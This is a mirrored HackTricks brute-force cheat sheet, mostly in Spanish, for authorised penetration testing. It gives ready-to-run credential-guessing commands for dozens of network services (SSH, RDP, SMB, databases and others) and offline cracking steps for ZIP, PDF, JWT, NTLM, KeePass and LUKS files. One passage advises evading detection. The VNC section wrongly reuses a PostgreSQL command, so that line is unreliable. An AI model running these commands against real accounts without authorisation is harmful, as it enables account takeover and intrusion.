Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/brute-force.md

46 KiB
Raw Blame History

Fuerza Bruta - Hoja de Trucos


Utiliza Trickest para construir y automatizar flujos de trabajo fácilmente con las herramientas comunitarias más avanzadas del mundo.
¡Accede hoy mismo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team AWS de HackTricks)!

Otras formas de apoyar a HackTricks:

Credenciales Predeterminadas

Busca en Google las credenciales predeterminadas de la tecnología que se está utilizando, o prueba estos enlaces:

Crea tus propios Diccionarios

Encuentra toda la información posible sobre el objetivo y genera un diccionario personalizado. Herramientas que pueden ayudar:

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)

@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%

Cewl

Cewl es una herramienta que se utiliza para generar listas de palabras clave a partir de un sitio web. Esto se logra extrayendo palabras del sitio y creando una lista ordenada por frecuencia. Estas listas pueden ser útiles para realizar ataques de fuerza bruta o para generar diccionarios personalizados para ataques de contraseñas.

cewl example.com -m 5 -w words.txt

CUPP

Genera contraseñas basadas en tu conocimiento sobre la víctima (nombres, fechas...)

python3 cupp.py -h

Wister

Una herramienta generadora de listas de palabras, que te permite suministrar un conjunto de palabras, dándote la posibilidad de crear múltiples variaciones a partir de las palabras dadas, creando una lista de palabras única e ideal para usar en relación a un objetivo específico.

python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst

__          _______  _____ _______ ______ _____
\ \        / /_   _|/ ____|__   __|  ____|  __ \
\ \  /\  / /  | | | (___    | |  | |__  | |__) |
\ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
\  /\  /   _| |_ ____) |  | |  | |____| | \ \
\/  \/   |_____|_____/   |_|  |______|_|  \_\

Version 1.0.3                    Cycurity

Generating wordlist...
[########################################] 100%
Generated 67885 lines.

Finished in 0.920s.

pydictor

Listas de palabras


Utiliza Trickest para construir y automatizar flujos de trabajo fácilmente con las herramientas comunitarias más avanzadas del mundo.
Obtén acceso hoy:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Servicios

Ordenados alfabéticamente por nombre de servicio.

AFP

nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run

AJP

nmap --script ajp-brute -p 8009 <IP>

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)

legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]

Cassandra

nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042

CouchDB

CouchDB es una base de datos NoSQL que se puede atacar mediante fuerza bruta para intentar adivinar credenciales débiles.

msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Registro de Docker

hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

Elasticsearch is a distributed, RESTful search and analytics engine capable of solving a growing number of use cases. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents.

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

Brute Force

Brute force attacks against FTP servers involve attempting to log in to an FTP server by systematically trying different usernames and passwords. This is typically done using automated tools that can quickly try thousands of combinations until the correct one is found.

Countermeasures

To protect against brute force attacks on FTP servers, consider implementing the following measures:

  • Strong Passwords: Encourage users to use strong, complex passwords that are difficult to guess.
  • Account Lockout: Implement account lockout policies that lock an account after a certain number of failed login attempts.
  • IP Whitelisting: Restrict FTP server access to specific IP addresses to prevent unauthorized login attempts.
  • Monitoring: Regularly monitor FTP server logs for suspicious login activities.
  • Two-Factor Authentication: Implement two-factor authentication to add an extra layer of security to FTP logins.

By implementing these countermeasures, you can significantly reduce the risk of successful brute force attacks against your FTP server.

hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21

Fuerza Bruta Genérica HTTP

WFuzz

Autenticación Básica HTTP

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/

HTTP - NTLM

legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/

HTTP - Enviar formulario

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https

Para https debes cambiar de "http-post-form" a "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla o (D)rupal o (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP

IMAP

Brute Force

Brute force attacks against IMAP are typically carried out using the hydra tool. The following command can be used to launch a brute force attack against an IMAP server:

hydra -l <username> -P <wordlist> -f <target_ip> imap
  • -l: Specify the username to attack.
  • -P: Specify the wordlist containing passwords to try.
  • -f: Stop the attack once the correct password is found.
  • imap: Specify the protocol to attack.

It is important to note that brute force attacks can be detected by intrusion detection systems (IDS) and can lead to account lockouts.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993

IRC

Brute Force

Brute force attacks are a common method used to gain unauthorized access to IRC channels. Attackers use automated tools to try a large number of username and password combinations until they find the correct one. This method is effective against weak passwords but can be time-consuming for longer and more complex passwords. It is important to use strong and unique passwords to protect against brute force attacks.

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

JSON Web Tokens (JWT) are an open, industry-standard (RFC 7519) method for representing claims securely between two parties.

#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>

#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

LDAP

nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match

MQTT

MQTT (Message Queuing Telemetry Transport) es un protocolo de mensajería ligero diseñado para dispositivos con ancho de banda limitado o conexiones inestables. Es comúnmente utilizado en aplicaciones IoT para la comunicación entre dispositivos y servidores.

ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt

MSSQL

legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433

MySQL

MySQL es un sistema de gestión de bases de datos relacional de código abierto ampliamente utilizado.

# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306

OracleSQL

Fuerza bruta

La fuerza bruta es un método comúnmente utilizado para descifrar contraseñas. Consiste en probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. En el contexto de OracleSQL, se puede utilizar para intentar acceder a cuentas protegidas por contraseña. Es importante tener en cuenta que el uso de fuerza bruta puede ser detectado por sistemas de seguridad y resultar en consecuencias negativas.

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt

Para usar oracle_login con patator necesitas instalar:

pip3 install cx_Oracle --upgrade

Fuerza bruta de hash de OracleSQL sin conexión (versiones 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, y 11.2.0.3):

nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

Fuerza bruta

La fuerza bruta es un método comúnmente utilizado para descifrar contraseñas. Consiste en probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. Este método puede ser efectivo, pero puede llevar mucho tiempo dependiendo de la complejidad de la contraseña y de la potencia de procesamiento disponible.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110

# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl

PostgreSQL

PostgreSQL es un sistema de gestión de bases de datos relacional de código abierto y potente. Es ampliamente utilizado en aplicaciones web y móviles.

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres
ncrack v U /root/Desktop/user.txt P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432

PPTP

Puedes descargar el paquete .deb para instalar desde https://http.kali.org/pool/main/t/thc-pptp-bruter/

sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP>

RDP

Fuerza bruta

La fuerza bruta es un método común para obtener acceso no autorizado a sistemas RDP. Consiste en probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. Se pueden utilizar herramientas como Hydra, Ncrack o Rdesktop para realizar ataques de fuerza bruta contra servidores RDP. Es importante tener en cuenta que los ataques de fuerza bruta pueden ser detectados fácilmente por los sistemas de defensa, por lo que es recomendable utilizar otras técnicas de hacking en combinación con la fuerza bruta para evitar ser detectado.

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]

Redis

Redis es una base de datos en memoria de código abierto que se utiliza comúnmente en aplicaciones web para almacenar datos en caché y sesiones de usuario. Al ser una base de datos en memoria, Redis es extremadamente rápido y eficiente en la recuperación y almacenamiento de datos. Sin embargo, al exponerse a Internet, Redis puede ser vulnerable a ataques de fuerza bruta si no se asegura adecuadamente. Es fundamental implementar medidas de seguridad sólidas, como contraseñas fuertes y listas de control de acceso, para proteger Redis de posibles intentos de fuerza bruta.

msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]

Rexec

Rexec is a simple service that allows users to execute commands on a remote system. It is often used for testing purposes and can be a target for brute force attacks.

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

Rlogin

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

Rsh (Remote Shell) is a simple remote shell client included in most Unix-like operating systems. It can be used to execute commands on a remote system. Attackers can use brute-force attacks to guess passwords and gain unauthorized access to remote systems via Rsh.

hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SFTP

legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

SNMP

SNMP (Simple Network Management Protocol) is a protocol used for network management and monitoring. It operates on the application layer of the OSI model and is commonly used to gather information from network devices such as routers, switches, and printers. SNMP uses a community string for authentication, which can be vulnerable to brute-force attacks.

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

SMB (Server Message Block) is a protocol used for sharing resources, such as files and printers, over a network. It is commonly used in Windows networks.

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]

SMTP

El Protocolo Simple de Transferencia de Correo (SMTP) es un protocolo de red utilizado para enviar correos electrónicos a través de una red IP.

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]

SOCKS

SOCKS (Socket Secure) is a protocol that routes network packets between a client and a server through a proxy server. It can be used for various purposes, including anonymity, circumventing network filters, and accessing restricted content. SOCKS operates at the transport layer and supports multiple authentication methods.

nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080

SQL Server

Brute Force

Brute force attacks against SQL Server typically involve attempting to guess usernames and passwords to gain unauthorized access. This can be done using automated tools that systematically try different combinations until the correct one is found. It is important to have strong passwords and implement other security measures to protect against brute force attacks.

Prevention

To prevent brute force attacks against SQL Server, consider implementing the following measures:

  • Enforce strong password policies
  • Implement account lockout policies
  • Monitor and log failed login attempts
  • Use multi-factor authentication
  • Limit access to SQL Server to authorized users only

By implementing these measures, you can significantly reduce the risk of unauthorized access through brute force attacks.

#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

SSH

SSH

hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

Claves SSH débiles / PRNG predecible de Debian

Algunos sistemas tienen fallos conocidos en la semilla aleatoria utilizada para generar material criptográfico. Esto puede resultar en un espacio de claves dramáticamente reducido que puede ser forzado con herramientas como snowdroppe/ssh-keybrute. Conjuntos pregenerados de claves débiles también están disponibles, como g0tmi1k/debian-ssh.

STOMP (ActiveMQ, RabbitMQ, HornetQ y OpenMQ)

El protocolo de texto STOMP es un protocolo de mensajería ampliamente utilizado que permite una comunicación e interacción fluida con servicios populares de encolado de mensajes como RabbitMQ, ActiveMQ, HornetQ y OpenMQ. Proporciona un enfoque estandarizado y eficiente para intercambiar mensajes y realizar diversas operaciones de mensajería.

legba stomp --target localhost:61613 --username admin --password data/passwords.txt

Telnet

Telnet es un protocolo de red que permite la comunicación bidireccional a través de terminales virtuales. Es comúnmente utilizado para realizar pruebas de conexión a un servidor remoto.

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin

VNC

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> u root -P /root/Desktop/pass.txt M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt t 1 x retry:fgep!='Authentication failure' --max-retries 0 x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba vnc --target localhost:5901 --password data/passwords.txt

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt


Utilice Trickest para construir y automatizar flujos de trabajo fácilmente con las herramientas comunitarias más avanzadas del mundo.
Obtenga acceso hoy:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Local

Bases de datos de cracking en línea

Revise esto antes de intentar hacer un ataque de fuerza bruta a un Hash.

ZIP

#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

zip2john file.zip > zip.john
john zip.john

#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack

Ataque de fuerza bruta de texto plano conocido en archivos zip

Necesitas conocer el texto plano (o parte del texto plano) de un archivo contenido dentro del zip encriptado. Puedes verificar los nombres de archivo y el tamaño de los archivos contenidos dentro de un zip encriptado ejecutando: 7z l encrypted.zip
Descarga bkcrack desde la página de versiones.

# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file

./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password

7z

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john

PDF

Fuerza bruta

La fuerza bruta es un método comúnmente utilizado para descifrar contraseñas y claves de cifrado. Consiste en probar todas las combinaciones posibles de caracteres hasta encontrar la correcta. Este método puede ser efectivo, pero también puede ser muy lento y consumir muchos recursos computacionales. Es importante tener en cuenta que el uso de la fuerza bruta puede ser ilegal y está sujeto a sanciones legales en muchos países.

apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

Contraseña del Propietario de PDF

Para crackear una contraseña del propietario de PDF, revisa esto: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/

JWT

git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack

#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John

Descifrado de NTLM

Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keberoasting

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Imagen de Lucks

Método 1

Instalar: https://github.com/glv2/bruteforce-luks

bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Método 2

cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash  wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt

Otro tutorial de BF de Luks: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1

Mysql

#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

Clave privada PGP/GPG

gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

Cisco

Clave maestra de DPAPI

Utiliza https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py y luego john

Columna protegida por contraseña en Open Office

Si tienes un archivo xlsx con una columna protegida por una contraseña, puedes desprotegerla:

  • Súbelo a Google Drive y la contraseña se eliminará automáticamente
  • Para eliminarla de forma manual:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .

Certificados PFX

# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx


Utilice Trickest para construir y automatizar flujos de trabajo fácilmente con las herramientas comunitarias más avanzadas del mundo.
Obtenga acceso hoy:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Herramientas

Ejemplos de hash: https://openwall.info/wiki/john/sample-hashes

Identificador de hash

hash-identifier
> <HASH>

Listas de palabras

Herramientas de generación de listas de palabras

  • kwprocessor: Generador avanzado de secuencias de teclado con caracteres base configurables, mapa de teclas y rutas.
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt

Mutación de John

Leer /etc/john/john.conf y configurarlo

john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules

Hashcat

Ataques de Hashcat

  • Ataque de lista de palabras (-a 0) con reglas

Hashcat ya viene con una carpeta que contiene reglas pero puedes encontrar otras reglas interesantes aquí.

hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
  • Ataque de combinación de listas de palabras

Es posible combinar 2 listas de palabras en 1 con hashcat.
Si la lista 1 contenía la palabra "hello" y la segunda contenía 2 líneas con las palabras "world" y "earth". Se generarán las palabras helloworld y helloearth.

# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt

# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
  • Ataque de máscara (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d

hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff

# Mask attack declaring custom charset
